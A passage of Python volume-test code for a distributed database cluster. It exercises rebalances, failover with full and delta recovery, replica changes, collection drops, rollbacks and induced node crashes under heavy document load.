tasks = self.perform_load(wait_for_load=False)
self.task.jython_task_manager.get_task_result(rebalance_task)
self.assertTrue(rebalance_task.result, "Rebalance Failed")
end_step_checks(tasks)
###################################################################
'''
Existing:
Sequential: 0 - 10M
Random: 0 - 10M, 50 - 60M
This Step:
Create Random: 60 - 70M
Delete Random: 50 - 60M
Update Random: 0 - 10M
Nodes In Cluster = 4 -> 3
Final Docs = 30M (Random: 0-10M, 60-70M, Sequential: 0-10M)
Nodes In Cluster = 3
'''
self.PrintStep("Step 10: Failover a node and RebalanceOut that node \
with loading in parallel")
self.std_vbucket_dist = self.input.param("std_vbucket_dist", None)
std = self.std_vbucket_dist or 1.0
prev_failover_stats = self.bucket_util.get_failovers_logs(
self.cluster.nodes_in_cluster, self.cluster.buckets)
disk_replica_dataset, disk_active_dataset = self.bucket_util.\
get_and_compare_active_replica_data_set_all(
self.cluster.nodes_in_cluster, self.cluster.buckets,
path=None)
self.rest = RestConnection(self.cluster.master)
self.nodes = self.cluster_util.get_nodes(self.cluster.master)
self.chosen = self.cluster_util.pick_nodes(self.cluster.master,
howmany=1)
# Mark Node for failover
self.generate_docs(doc_ops=["update", "delete", "read", "create"])
tasks_info = self.data_load()
self.success_failed_over = self.rest.fail_over(self.chosen[0].id,
graceful=True)
self.sleep(10)
self.assertTrue(self.rest.monitorRebalance(), msg="Failover -> Rebalance failed")
self.nodes = self.rest.node_statuses()
self.set_num_writer_and_reader_threads(
num_writer_threads=self.new_num_writer_threads,
num_reader_threads=self.new_num_reader_threads)
self.rest.rebalance(otpNodes=[node.id for node in self.nodes],
ejectedNodes=[self.chosen[0].id])
self.assertTrue(self.rest.monitorRebalance(), msg="Rebalance failed")
servs_out = [node for node in self.cluster.servers
if node.ip == self.chosen[0].ip]
self.cluster.nodes_in_cluster = list(
set(self.cluster.nodes_in_cluster) - set(servs_out))
self.available_servers += servs_out
end_step_checks(tasks_info)
self.bucket_util.compare_failovers_logs(
self.cluster,
prev_failover_stats,
self.cluster.nodes_in_cluster,
self.cluster.buckets)
self.bucket_util.data_analysis_active_replica_all(
disk_active_dataset, disk_replica_dataset,
self.cluster.servers[:self.nodes_in + self.nodes_init],
self.cluster.buckets, path=None)
nodes = self.cluster_util.get_nodes_in_cluster(self.cluster)
self.bucket_util.vb_distribution_analysis(
self.cluster,
servers=nodes, buckets=self.cluster.buckets,
num_replicas=self.num_replicas,
std=std, total_vbuckets=self.cluster.vbuckets)
###################################################################
'''
Existing:
Sequential: 0 - 10M
Random: 0 - 10M, 60 - 70M
This Step:
Create Random: 70 - 80M
Delete Random: 60 - 70M
Update Random: 0 - 10M
Nodes In Cluster = 3 -> 3
Final Docs = 30M (Random: 0-10M, 70-80M, Sequential: 0-10M)
Nodes In Cluster = 3
'''
self.PrintStep("Step 11: Failover a node and FullRecovery\
that node")
self.std_vbucket_dist = self.input.param("std_vbucket_dist", None)
std = self.std_vbucket_dist or 1.0
prev_failover_stats = self.bucket_util.get_failovers_logs(
self.cluster.nodes_in_cluster, self.cluster.buckets)
disk_replica_dataset, disk_active_dataset = self.bucket_util.\
get_and_compare_active_replica_data_set_all(
self.cluster.nodes_in_cluster,
self.cluster.buckets,
path=None)
self.rest = RestConnection(self.cluster.master)
self.nodes = self.cluster_util.get_nodes(self.cluster.master)
self.chosen = self.cluster_util.pick_nodes(self.cluster.master,
howmany=1)
self.generate_docs(doc_ops=["update", "delete", "read", "create"])
tasks_info = self.data_load()
# Mark Node for failover
self.success_failed_over = self.rest.fail_over(self.chosen[0].id,
graceful=True)
self.sleep(60, "Waiting for failover to finish and settle down cluster.")
self.assertTrue(self.rest.monitorRebalance(), msg="Failover -> Rebalance failed")
# Mark Node for full recovery
if self.success_failed_over:
self.rest.set_recovery_type(otpNode=self.chosen[0].id,
recoveryType="full")
self.sleep(60, "Waiting for full recovery to finish and settle down cluster.")
rebalance_task = self.task.async_rebalance(
self.cluster.nodes_in_cluster, [], [],
retry_get_process_num=3000)
self.task.jython_task_manager.get_task_result(rebalance_task)
self.assertTrue(rebalance_task.result, "Rebalance Failed")
end_step_checks(tasks_info)
self.bucket_util.compare_failovers_logs(
self.cluster,
prev_failover_stats,
self.cluster.nodes_in_cluster,
self.cluster.buckets)
self.bucket_util.data_analysis_active_replica_all(
disk_active_dataset, disk_replica_dataset,
self.cluster.nodes_in_cluster,
self.cluster.buckets, path=None)
self.bucket_util.vb_distribution_analysis(
self.cluster,
servers=self.cluster.nodes_in_cluster,
buckets=self.cluster.buckets,
num_replicas=self.num_replicas,
std=std, total_vbuckets=self.cluster.vbuckets)
###################################################################
'''
Existing:
Sequential: 0 - 10M
Random: 0 - 10M, 70 - 80M
This Step:
Create Random: 80 - 90M
Delete Random: 70 - 80M
Update Random: 0 - 10M
Nodes In Cluster = 3 -> 3
Final Docs = 30M (Random: 0-10M, 80-90M, Sequential: 0-10M)
Nodes In Cluster = 3
'''
self.PrintStep("Step 12: Failover a node and DeltaRecovery that \
node with loading in parallel")
self.std_vbucket_dist = self.input.param("std_vbucket_dist", None)
std = self.std_vbucket_dist or 1.0
prev_failover_stats = self.bucket_util.get_failovers_logs(
self.cluster.nodes_in_cluster, self.cluster.buckets)
disk_replica_dataset, disk_active_dataset = self.bucket_util.\
get_and_compare_active_replica_data_set_all(
self.cluster.nodes_in_cluster,
self.cluster.buckets,
path=None)
self.rest = RestConnection(self.cluster.master)
self.nodes = self.cluster_util.get_nodes(self.cluster.master)
self.chosen = self.cluster_util.pick_nodes(self.cluster.master,
howmany=1)
self.generate_docs(doc_ops=["update", "delete", "read", "create"])
tasks_info = self.data_load()
# Mark Node for failover
self.success_failed_over = self.rest.fail_over(self.chosen[0].id,
graceful=True)
self.sleep(60, "Waiting for failover to finish and settle down cluster.")
self.rest.monitorRebalance()
if self.success_failed_over:
self.rest.set_recovery_type(otpNode=self.chosen[0].id,
recoveryType="delta")
self.set_num_writer_and_reader_threads(
num_writer_threads=self.new_num_writer_threads,
num_reader_threads=self.new_num_reader_threads)
self.sleep(60, "Waiting for delta recovery to finish and settle down cluster.")
rebalance_task = self.task.async_rebalance(
self.cluster.nodes_in_cluster, [], [],
retry_get_process_num=3000)
self.set_num_writer_and_reader_threads(
num_writer_threads="disk_io_optimized",
num_reader_threads="disk_io_optimized")
self.task.jython_task_manager.get_task_result(rebalance_task)
self.assertTrue(rebalance_task.result, "Rebalance Failed")
end_step_checks(tasks_info)
self.bucket_util.compare_failovers_logs(
self.cluster,
prev_failover_stats,
self.cluster.nodes_in_cluster,
self.cluster.buckets)
self.bucket_util.data_analysis_active_replica_all(
disk_active_dataset, disk_replica_dataset,
self.cluster.nodes_in_cluster,
self.cluster.buckets, path=None)
self.bucket_util.vb_distribution_analysis(
self.cluster,
servers=self.cluster.nodes_in_cluster,
buckets=self.cluster.buckets,
num_replicas=self.num_replicas,
std=std, total_vbuckets=self.cluster.vbuckets)
###################################################################
'''
Existing:
Sequential: 0 - 10M
Random: 0 - 10M, 80 - 90M
This Step:
Create Random: 90 - 100M
Delete Random: 80 - 90M
Update Random: 0 - 10M
Replica 1 - > 2
Final Docs = 30M (Random: 0-10M, 90-100M, Sequential: 0-10M)
Nodes In Cluster = 3
'''
self.PrintStep("Step 13: Updating the bucket replica to 2")
bucket_helper = BucketHelper(self.cluster.master)
for i in range(len(self.cluster.buckets)):
bucket_helper.change_bucket_props(
self.cluster.buckets[i], replicaNumber=2)
self.generate_docs(doc_ops=["update", "delete", "read", "create"])
rebalance_task = self.rebalance(nodes_in=1, nodes_out=0)
tasks_info = self.data_load()
self.task.jython_task_manager.get_task_result(rebalance_task)
self.assertTrue(rebalance_task.result, "Rebalance Failed")
end_step_checks(tasks_info)
####################################################################
'''
Existing:
Sequential: 0 - 10M
Random: 0 - 10M, 90 - 100M
This Step:
Create Random: 100 - 110M
Delete Random: 90 - 100M
Update Random: 0 - 10M
Replica 2 - > 1
Final Docs = 30M (Random: 0-10M, 100-110M, Sequential: 0-10M)
Nodes In Cluster = 3
'''
self.PrintStep("Step 14: Updating the bucket replica to 1")
bucket_helper = BucketHelper(self.cluster.master)
for i in range(len(self.cluster.buckets)):
bucket_helper.change_bucket_props(
self.cluster.buckets[i], replicaNumber=1)
self.generate_docs(doc_ops=["update", "delete", "read", "create"])
self.set_num_writer_and_reader_threads(
num_writer_threads=self.new_num_writer_threads,
num_reader_threads=self.new_num_reader_threads)
rebalance_task = self.task.async_rebalance(self.cluster.nodes_in_cluster,
[], [],
retry_get_process_num=3000)
tasks_info = self.data_load()
self.task.jython_task_manager.get_task_result(rebalance_task)
self.assertTrue(rebalance_task.result, "Rebalance Failed")
end_step_checks(tasks_info)
#######################################################################
self.PrintStep("Step 15: Flush the bucket and \
start the entire process again")
self.loop += 1
if self.loop < self.iterations:
# Flush the bucket
result = self.bucket_util.flush_all_buckets(self.cluster)
self.assertTrue(result, "Flush bucket failed!")
self.sleep(600)
if len(self.cluster.nodes_in_cluster) > self.nodes_init:
nodes_cluster = self.cluster.nodes_in_cluster[:]
nodes_cluster.remove(self.cluster.master)
servs_out = random.sample(
nodes_cluster,
int(len(self.cluster.nodes_in_cluster)
- self.nodes_init))
rebalance_task = self.task.async_rebalance(
self.cluster.servers[:self.nodes_init], [], servs_out,
retry_get_process_num=3000)
self.task.jython_task_manager.get_task_result(
rebalance_task)
self.assertTrue(rebalance_task.result, "Rebalance Failed")
self.available_servers += servs_out
self.cluster.nodes_in_cluster = list(
set(self.cluster.nodes_in_cluster) - set(servs_out))
else:
self.log.info("Volume Test Run Complete")
self.init_doc_params()
def ReadHeavyWorkload(self):
#######################################################################
self.key_prefix = "random_keys"
self.loop = 1
self.skip_read_on_error = True
self.suppress_error_table = True
self.doc_ops = ["create"]
self.create_perc = 100
for bucket in self.cluster.buckets:
self.PrintStep("Step 1: Create %s items" % self.num_items)
self.generate_docs(doc_ops=self.doc_ops)
self.perform_load(validate_data=False)
dgm = self.get_bucket_dgm(bucket)
while self.dgm and dgm > self.dgm:
self.generate_docs(doc_ops=self.doc_ops)
dgm = self.get_bucket_dgm(bucket)
self.perform_load(validate_data=False)
self.doc_ops = ["read"]
self.read_perc = 100
self.generate_docs(doc_ops=self.doc_ops)
self.data_validation()
while self.loop <= self.iterations:
task = self.perform_load(wait_for_load=False, validate_data=False)
self.wait_for_doc_load_completion(task)
result = self.check_coredump_exist(self.cluster.nodes_in_cluster)
if result:
self.PrintStep("CRASH | CRITICAL | WARN messages found in cb_logs")
if self.assert_crashes_on_load:
self.task.jython_task_manager.abort_all_tasks()
self.assertFalse(result)
self.bucket_util.print_bucket_stats(self.cluster)
self.print_crud_stats()
for bucket in self.cluster.buckets:
self.get_bucket_dgm(bucket)
if bucket.storageBackend == Bucket.StorageBackend.magma:
self.get_magma_disk_usage(bucket)
def MB_43460(self):
self.loop = 1
while self.loop <= self.iterations:
#######################################################################
'''
creates: 0 - 10M
creates: 0 - 10M
Final Docs = 20M (0-20M)
'''
self.create_perc = 200
self.PrintStep("Step 4: Load %s items, sequential keys" %
str(self.num_items*self.create_perc/100))
self.generate_docs(doc_ops="create")
self.perform_load(validate_data=False)
#######################################################################
self.PrintStep("Step 13: Drop a collection")
total_collections = self.num_collections
total_scopes = self.num_scopes
drop = 0
for bucket in self.cluster.buckets:
for scope in bucket.scopes.keys():
drop = 0
for i in range(1, total_collections, 2):
collection = self.collection_prefix + str(i)
self.bucket_util.drop_collection(self.cluster.master,
bucket,
scope,
collection)
bucket.scopes[scope].collections.pop(collection)
drop += 1
self.num_collections = self.num_collections - drop
self.bucket_util._wait_for_stats_all_buckets(self.cluster,
self.cluster.buckets)
self.final_items = self.final_items * (self.num_collections)/total_collections
self.log.info("Expected items after dropping collections: {}".
format(self.final_items))
self.bucket_util.verify_stats_all_buckets(self.cluster,
self.final_items,
timeout=3600)
if self.end_step == 13:
exit(13)
#######################################################################
self.PrintStep("Step 14: Normal Rollback with deletes")
'''
Final Docs = 30M (0-20M, 10M Random)
'''
mem_only_items = self.input.param("rollback_items", 100000)
self.perform_rollback(0, mem_only_items, doc_type="delete")
if self.end_step == 14:
exit(14)
def MB_42652(self):
self.loop = 1
while self.loop <= self.iterations:
#######################################################################
'''
creates: 0 - 10M
creates: 0 - 10M
Final Docs = 20M (0-20M)
'''
self.create_perc = 200
self.PrintStep("Step 4: Load %s items, sequential keys" %
str(self.num_items*self.create_perc/100))
self.generate_docs(doc_ops="create",
create_start=0,
create_end=self.num_items)
self.perform_load(validate_data=False)
if self.end_step == 4:
exit(4)
'''
fragmentation at this time: 0, total data: 2X, stale: 0
'''
#######################################################################
'''
update: 0 - 1M * 10
Final Docs = 20M (0-20M)
'''
self.update_perc = 100
self.PrintStep("Step 5: Update the first set of %s percent (%s) items \
%s times" % (str(self.update_perc),
str(self.num_items*self.update_perc/100),
str(self.step_iterations)))
_iter = 0
while _iter < self.step_iterations:
self.PrintStep("Step 5.%s: Update the first set of %s percent (%s) \
items %s times" % (str(_iter), str(self.update_perc),
str(self.num_items*self.update_perc/100),
str(self.step_iterations)))
self.generate_docs(doc_ops="update")
self.perform_load(crash=False, validate_data=True)
_iter += 1
if self.end_step == 5:
exit(5)
'''
fragmentation at this time: 50, total data: 2X, stale: X
'''
#######################################################################
'''
Create Random: 0 - 10M
Final Docs = 30M (0-20M, 10M Random)
'''
temp = self.key_prefix
self.key_prefix = "random_keys"
self.key_type = "RandomKey"
self.create_perc = 100
self.PrintStep("Step 7: Create %s random keys" %
str(self.num_items*self.create_perc/100))
self.generate_docs(doc_ops="create",
create_start=0,
create_end=self.num_items)
self.perform_load(crash=False, validate_data=True)
self.key_prefix = temp
'''
fragmentation: 50, total data: 3X, stale: X
'''
#######################################################################
'''
Update Random: 0 - 10M
Final Docs = 30M (0-20M, 10M Random)
'''
_iter = 0
self.update_perc = 100
self.key_prefix = "random_keys"
self.PrintStep("Step 8: Update all %s random items %s times" %
(str(self.num_items*self.update_perc/100),
str(self.step_iterations)))
while _iter < self.step_iterations:
self.PrintStep("Step 8.%s: Update all %s random items %s times" %
(str(_iter),
str(self.num_items*self.update_perc/100),
str(self.step_iterations)))
self.generate_docs(doc_ops="update",
update_start=self.start,
update_end=self.end*self.update_perc/100)
self.perform_load(crash=False, validate_data=True)
_iter += 1
self.key_prefix = temp
if self.end_step == 8:
exit(8)
'''
fragmentation: 50, total data: 3X, stale: 1.5X
'''
#######################################################################
self.PrintStep("Step 13: Drop a collection")
total_collections = self.num_collections
total_items = self.final_items
drop = 0
for bucket in self.cluster.buckets:
for scope in bucket.scopes.keys():
drop = 0
for i in range(1, total_collections, 2):
collection = self.collection_prefix + str(i)
self.bucket_util.drop_collection(self.cluster.master,
bucket,
scope,
collection)
bucket.scopes[scope].collections.pop(collection)
self.sleep(random.randint(1, 4))
drop += 1
if drop % (total_collections/4) == 0:
self.sleep(60, "Sleep after dropping half collections...")
self.bucket_util._wait_for_stats_all_buckets(self.cluster,
self.cluster.buckets)
total_items = self.final_items * (total_collections - drop)/total_collections
self.log.info("Expected items after dropping collections: {}".
format(total_items))
self.bucket_util.verify_stats_all_buckets(self.cluster,
total_items,
timeout=3600)
self.bucket_util._wait_for_stats_all_buckets(self.cluster,
self.cluster.buckets)
total_items = self.final_items * (total_collections - drop)/total_collections
self.log.info("Expected items after dropping collections: {}".
format(total_items))
self.bucket_util.verify_stats_all_buckets(self.cluster,
total_items,
timeout=3600)
self.final_items = total_items
self.num_collections = self.num_collections - drop
if self.end_step == 13:
exit(13)
#######################################################################
for bucket in self.cluster.buckets:
for scope in bucket.scopes.keys():
for i in range(1, total_collections, 2):
collection = self.collection_prefix + str(i)
self.bucket_util.create_collection(self.cluster.master,
bucket,
scope,
{"name": collection})
self.num_collections += 1
self.sleep(0.5)
self.bucket_util.flush_all_buckets(self.cluster)
self.init_doc_params()
self.sleep(10, "Iteration %s completed successfully !!!" % self.loop)
self.loop += 1
if self.end_step == 18:
exit(18)
def SteadyStateVolume(self):
check_dump_th = threading.Thread(target=self.check_dump)
check_dump_th.start()
self.loop = 1
self.PrintStep("Step 3: Create %s items and checkout fragmentation" % str(self.num_items))
self.create_perc = 100
self.generate_docs(doc_ops=["create"],
create_start=0,
create_end=self.num_items)
self.perform_load(validate_data=False)
self.generate_docs(doc_ops=["create"],
create_start=self.end,
create_end=self.end+self.num_items)
self.perform_load(validate_data=False)
if self.end_step == 2:
exit(2)
while self.loop <= self.iterations:
#######################################################################
'''
creates: 0 - 10M
deletes: 0 - 10M
Final Docs = 0
'''
self.PrintStep("Step 4: Starting parallel cruds")
self.create_perc, self.read_perc, self.update_perc, self.delete_perc = [100/len(self.doc_ops)]*4
self.generate_docs()
self.perform_load(validate_data=True)
if self.end_step == 3:
exit(3)
'''
fragmentation at this time: 0
'''
#######################################################################
'''
|----READ----|----UPDATE----|----DELETE----|----CREATE----|
25% 25% 25% 25%
Reverse Update: 10M - 9M
Final Docs = 20M (0-20M)
'''
_iter = 0
self.update_perc = 100
self.PrintStep("Step 6: Reverse Update last set of %s percent (%s-%s) \
items %s times" % (str(self.update_perc), str(self.num_items-1),
str(self.num_items+1 -
self.num_items),
str(self.step_iterations)))
while _iter < self.step_iterations:
self.PrintStep("Step 6.%s: Reverse Update last set of %s percent \
(%s-%s) items %s times" % (str(_iter), str(self.update_perc),
str(self.num_items+1),
str(self.num_items+1 -
self.num_items),
str(self.step_iterations)))
start = -self.update_end + 1
end = -self.update_start
self.generate_docs(doc_ops=["update"],
update_start=start,
update_end=end)
self.perform_load(crash=False, validate_data=True)
_iter += 1
if self.end_step == 6:
exit(6)
'''
fragmentation: 50, total data: 2X, stale: X
'''
#######################################################################
'''
Create Random: 0 - 10M
Final Docs = 30M (0-20M, 10M Random)
'''
temp = self.key_prefix
self.key_type = "RandomKey"
self.create_perc = 100
self.PrintStep("Step 7: Create %s random keys" % str(self.num_items))
self.generate_docs(doc_ops=["create"],
create_start=self.start,
create_end=self.start + self.num_items)
self.perform_load(crash=False, validate_data=True)
self.key_prefix = temp
'''
fragmentation: 50, total data: 3X, stale: X
'''
#######################################################################
'''
Update Random: 0 - 10M
Final Docs = 30M (0-20M, 10M Random)
'''
_iter = 0
self.update_perc = 100
self.PrintStep("Step 8: Update all %s random items %s times" %
(str(self.num_items*self.update_perc/100),
str(self.step_iterations)))
while _iter < self.step_iterations:
self.PrintStep("Step 8.%s: Update all %s random items %s times" %
(str(_iter),
str(self.num_items),
str(self.step_iterations)))
self.generate_docs(doc_ops=["update"],
update_start=self.start,
update_end=self.end)
self.perform_load(crash=False, validate_data=True)
_iter += 1
self.key_prefix = temp
if self.end_step == 8:
exit(8)
'''
fragmentation: 50, total data: 3X, stale: 1.5X
'''
#######################################################################
'''
Delete Random: 0 - 10M
Create Random: 0 - 10M
Final Docs = 30M (0-20M, 10M Random)
'''
self.key_prefix = "random_keys"
self.delete_perc = 100
self.PrintStep("Step 9: Delete/Re-Create all %s random items" %
str(self.num_items))
self.generate_docs(doc_ops=["delete"],
delete_start=self.start,
delete_end=self.end)
self.perform_load(crash=False, validate_data=True)
'''
fragmentation: 50, total data: 3X, stale: 1.5X
'''
self.generate_docs(doc_ops=["create"],
create_start=self.start,
create_end=self.end)
self.perform_load(crash=False, validate_data=True)
self.key_prefix = temp
if self.end_step == 9:
exit(9)
#######################################################################
'''
Update: 0 - 1M
Final Docs = 30M (0-20M, 10M Random)
'''
self.create_perc, self.read_perc, self.update_perc, self.delete_perc = [100/len(self.doc_ops)]*4
self.PrintStep("Step 10: Update %s percent(%s) items %s times and \
crash during recovery" % (str(self.update_perc),
str(self.num_items),
str(self.step_iterations)))
_iter = 0
while _iter < self.step_iterations and self.crashes:
self.PrintStep("Step 10.%s: Update %s percent(%s) items %s times \
and crash during recovery" % (str(_iter), str(self.update_perc),
str(self.num_items),
str(self.step_iterations)))
self.generate_docs(doc_ops=self.doc_ops)
self.perform_load(crash=True, validate_data=False)
_iter += 1
self.bucket_util._wait_for_stats_all_buckets(self.cluster,
self.cluster.buckets,
timeout=1200)
if self.end_step == 10:
exit(10)
#######################################################################
self.PrintStep("Step 11: Normal Rollback with creates")
'''
Final Docs = 30M (0-20M, 10M Random)
'''
mem_only_items = self.input.param("rollback_items", 100000)
self.perform_rollback(self.final_items, mem_only_items,
doc_type="create")
if self.end_step == 11:
exit(11)
#######################################################################
self.PrintStep("Step 12: Normal Rollback with updates")
'''
Final Docs = 30M (0-20M, 10M Random)
'''
self.perform_rollback(0, mem_only_items, doc_type="update")
if self.end_step == 12:
exit(12)
#######################################################################
self.PrintStep("Step 13: Drop a collection")
total_collections = self.num_collections
total_scopes = self.num_scopes
drop = 0
for bucket in self.cluster.buckets:
for scope in bucket.scopes.keys():
drop = 0
for i in range(1, total_collections, 2):
collection = self.collection_prefix + str(i)
self.bucket_util.drop_collection(self.cluster.master,
bucket,
scope,
collection)
bucket.scopes[scope].collections.pop(collection)
drop += 1
self.num_collections = self.num_collections - drop
self.bucket_util._wait_for_stats_all_buckets(self.cluster,
self.cluster.buckets)
self.final_items = self.final_items * (self.num_collections)/total_collections
self.log.info("Expected items after dropping collections: {}".
format(self.final_items))
self.bucket_util.verify_stats_all_buckets(self.cluster,
self.final_items,
timeout=3600)
if self.end_step == 13:
exit(13)
#######################################################################
self.PrintStep("Step 14: Normal Rollback with deletes")
'''
Final Docs = 30M (0-20M, 10M Random)
'''
self.perform_rollback(0, mem_only_items, doc_type="delete")
if self.end_step == 14:
exit(14)
#######################################################################
self.PrintStep("Step 15: Normal Rollback with expiry")
'''
Final Docs = 30M (0-20M, 10M Random)
'''
self.perform_rollback(0, mem_only_items, doc_type="expiry")
if self.end_step == 15:
exit(15)
#######################################################################
self.skip_read_on_error = True
self.suppress_error_table = True
self.track_failures = False
if self.crashes:
self.PrintStep("Step 16: Random crashes during CRUD-Expiry")
'''
Creates: 20M-50M
Final Docs = 60M (0-50M, 10M Random)
Updates: 0M-20M
Final Docs = 60M (0-50M, 10M Random)
Deletes: 0M-20M
Final Docs = 40M (20-50M, 10M Random)
Expiry: 0M-20M , MAXTTL=5s
Final Docs = 40M (20-50M, 10M Random)
'''
self.create_perc = 300
self.update_perc = 200
self.delete_perc = 200
self.expiry_perc = 200
self.generate_docs(doc_ops="create;update;delete;expiry",
delete_start=0,
delete_end=self.num_items*self.delete_perc/100,
expire_start=0,
expire_end=self.num_items*self.expiry_perc/100)
task = self.data_load()
th = threading.Thread(target=self.crash_thread,
kwargs={"graceful": False})
th.start()
self.task_manager.get_task_result(task)
self.stop_crash = True
th.join()
if self.end_step == 16:
exit(16)
#######################################################################
self.skip_read_on_error = True
self.suppress_error_table = True
self.track_failures = False
self.PrintStep("Step 17: Random crashes during CRUD-Expiry")
'''
Creates: 50M-80M
Final Docs = 90M (0-80M, 10M Random)
Updates: 0M-20M
Final Docs = 90M (0-80M, 10M Random)
Deletes: 0M-20M
Final Docs = 70M (20-90M, 10M Random)
Expiry: 0M-20M , MAXTTL=5s
Final Docs = 40M (20-50M, 10M Random)
'''
self.create_perc = 300
self.update_perc = 200
self.delete_perc = 150
self.expiry_perc = 150
self.generate_docs(doc_ops="create;update;delete;expiry")
task = self.data_load()
th = threading.Thread(target=self.crash_thread,
kwargs={"graceful": False,
"num_kills": 20})
th.start()
self.task_manager.get_task_result(task)
self.stop_crash = True
th.join()
if self.end_step == 17:
exit(17)
#######################################################################
for bucket in self.cluster.buckets:
for scope in bucket.scopes.keys():
for i in range(1, total_collections, 2):
collection = self.collection_prefix + str(i)
self.bucket_util.create_collection(self.cluster.master,
bucket,
scope,
{"name": collection})
self.num_collections += 1
self.sleep(0.5)
self.bucket_util.flush_all_buckets(self.cluster)
self.init_doc_params()
self.sleep(600, "Iteration %s completed successfully !!!" % self.loop)
self.loop += 1
if self.end_step == 18:
exit(18)
def SystemTestMagma(self):
#######################################################################
self.loop = 1
self.skip_read_on_error = True
self.suppress_error_table = True
self.track_failures = False
self.crash_count = 0
self.stop_rebalance = self.input.param("pause_rebalance", False)
self.crashes = self.input.param("crashes", 20)
self.PrintStep("Step 3: Create %s items sequentially" % self.num_items)
self.expiry_perc = 100
self.create_perc = 100
self.update_perc = 100
self.delete_perc = 100
self.key_prefix = "random"
self.doc_ops = self.input.param("doc_ops", ["expiry"])
self.generate_docs(doc_ops=self.doc_ops,
expire_start=0,
expire_end=self.num_items,
create_start=self.num_items,
create_end=self.num_items*2,
update_start=self.num_items*2,
update_end=self.num_items*3
)
self.perform_load(wait_for_load=False)
self.sleep(300)
while self.loop <= self.iterations:
###################################################################
self.PrintStep("Step 4: Rebalance in with Loading of docs")
rebalance_task = self.rebalance(nodes_in=1, nodes_out=0)
if self.stop_rebalance:
rebalance_task = self.pause_rebalance()
else:
rebalance_task = self.abort_rebalance(rebalance_task, "kill_memcached")
self.task.jython_task_manager.get_task_result(rebalance_task)
self.assertTrue(rebalance_task.result, "Rebalance Failed")
self.print_stats()
th = threading.Thread(target=self.crash_thread,
kwargs={"graceful": False})
th.start()
while self.crash_count < self.crashes:
continue
self.stop_crash = True
th.join()
###################################################################
self.PrintStep("Step 5: Rebalance Out with Loading of docs")
rebalance_task = self.rebalance(nodes_in=0, nodes_out=1)
if self.stop_rebalance:
rebalance_task = self.pause_rebalance()
else:
rebalance_task = self.abort_rebalance(rebalance_task, "kill_memcached")
self.task.jython_task_manager.get_task_result(rebalance_task)
self.assertTrue(rebalance_task.result, "Rebalance Failed")
self.print_stats()
th = threading.Thread(target=self.crash_thread,
kwargs={"graceful": False})
th.start()
while self.crash_count < self.crashes:
continue
self.stop_crash = True
th.join()
###################################################################
self.PrintStep("Step 6: Rebalance In_Out with Loading of docs")
rebalance_task = self.rebalance(nodes_in=2, nodes_out=1)
if self.stop_rebalance:
rebalance_task = self.pause_rebalance()
else:
rebalance_task = self.abort_rebalance(rebalance_task, "kill_memcached")
self.task.jython_task_manager.get_task_result(rebalance_task)
self.assertTrue(rebalance_task.result, "Rebalance Failed")
self.print_stats()
th = threading.Thread(target=self.crash_thread,
kwargs={"graceful": False})
th.start()
while self.crash_count < self.crashes:
continue
self.stop_crash = True
th.join()
###################################################################
self.PrintStep("Step 7: Swap with Loading of docs")
rebalance_task = self.rebalance(nodes_in=1, nodes_out=1)
if self.stop_rebalance:
rebalance_task = self.pause_rebalance()
else:
rebalance_task = self.abort_rebalance(rebalance_task, "kill_memcached")
self.task.jython_task_manager.get_task_result(rebalance_task)
self.assertTrue(rebalance_task.result, "Rebalance Failed")
self.print_stats()
th = threading.Thread(target=self.crash_thread,
kwargs={"graceful": False})
th.start()
while self.crash_count < self.crashes:
continue
self.stop_crash = True
th.join()
###################################################################
self.PrintStep("Step 8: Failover a node and RebalanceOut that node \
with loading in parallel")
# Chose node to failover
self.rest = RestConnection(self.cluster.master)
self.nodes = self.cluster_util.get_nodes(self.cluster.master)
self.chosen = self.cluster_util.pick_nodes(self.cluster.master,
howmany=1)
# Failover Node
self.success_failed_over = self.rest.fail_over(self.chosen[0].id,
graceful=True)
self.sleep(10)
self.rest.monitorRebalance()
# Rebalance out failed over node
self.otpNodes = self.rest.node_statuses()
self.rest.rebalance(otpNodes=[otpNode.id for otpNode in self.otpNodes],
ejectedNodes=[self.chosen[0].id])
self.assertTrue(self.rest.monitorRebalance(stop_if_loop=True),
msg="Rebalance failed")
# Maintain nodes availability
servs_out = [node for node in self.cluster.servers
if node.ip == self.chosen[0].ip]
self.cluster.nodes_in_cluster = list(
set(self.cluster.nodes_in_cluster) - set(servs_out))
self.available_servers += servs_out
self.print_stats()
th = threading.Thread(target=self.crash_thread,
kwargs={"graceful": False})
th.start()
while self.crash_count < self.crashes:
continue
self.stop_crash = True
th.join()
###################################################################
self.PrintStep("Step 9: Failover a node and FullRecovery\
that node")
self.rest = RestConnection(self.cluster.master)
self.nodes = self.cluster_util.get_nodes(self.cluster.master)
self.chosen = self.cluster_util.pick_nodes(self.cluster.master,
howmany=1)
# Mark Node for failover
self.success_failed_over = self.rest.fail_over(self.chosen[0].id,
graceful=True)
self.sleep(10)
self.rest.monitorRebalance()
# Mark Node for full recovery
if self.success_failed_over:
self.rest.set_recovery_type(otpNode=self.chosen[0].id,
recoveryType="full")
rebalance_task = self.task.async_rebalance(
self.cluster.servers[:self.nodes_init], [], [],
retry_get_process_num=3000)
self.task.jython_task_manager.get_task_result(rebalance_task)
self.assertTrue(rebalance_task.result, "Rebalance Failed")
self.print_stats()
th = threading.Thread(target=self.crash_thread,
kwargs={"graceful": False})
th.start()
while self.crash_count < self.crashes:
continue
self.stop_crash = True
th.join()
###################################################################
self.PrintStep("Step 10: Failover a node and DeltaRecovery that \
node with loading in parallel")
self.rest = RestConnection(self.cluster.master)
self.nodes = self.cluster_util.get_nodes(self.cluster.master)
self.chosen = self.cluster_util.pick_nodes(self.cluster.master,
howmany=1)
# Mark Node for failover
self.success_failed_over = self.rest.fail_over(self.chosen[0].id,
graceful=True)
self.sleep(10)
self.rest.monitorRebalance()
if self.success_failed_over:
self.rest.set_recovery_type(otpNode=self.chosen[0].id,
recoveryType="delta")
rebalance_task = self.task.async_rebalance(
self.cluster.servers[:self.nodes_init], [], [],
retry_get_process_num=3000)
self.task.jython_task_manager.get_task_result(rebalance_task)
self.assertTrue(rebalance_task.result, "Rebalance Failed")
self.print_stats()
th = threading.Thread(target=self.crash_thread,
kwargs={"graceful": False})
th.start()
while self.crash_count < self.crashes:
continue
self.stop_crash = True
th.join()
###################################################################
self.PrintStep("Step 12: Updating the bucket replica to 2")
bucket_helper = BucketHelper(self.cluster.master)
for i in range(len(self.cluster.buckets)):
bucket_helper.change_bucket_props(
self.cluster.buckets[i], replicaNumber=2)
rebalance_task = self.rebalance(nodes_in=1, nodes_out=0)
if self.stop_rebalance:
rebalance_task = self.pause_rebalance()
